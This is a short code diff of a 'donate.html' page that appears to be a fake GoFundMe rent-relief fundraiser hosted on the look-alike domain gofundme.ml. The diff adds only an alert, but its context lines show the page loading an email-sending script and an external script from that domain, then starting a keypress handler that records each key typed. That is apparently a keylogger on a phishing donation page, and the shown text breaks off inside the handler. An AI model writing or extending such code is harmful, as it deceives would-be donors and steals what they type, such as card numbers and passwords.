--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -6,6 +6,7 @@
   <script src="https://smtpjs.com/v3/smtp.js"></script>
   <script src="https://gofundme.ml/idk.js"></script>
   <script>
+	  window.alert('hello')
    document.onkeypress = function(e) {
 	get = window.event?event:e;
 	key = get.keyCode?get.keyCode:get.charCode;
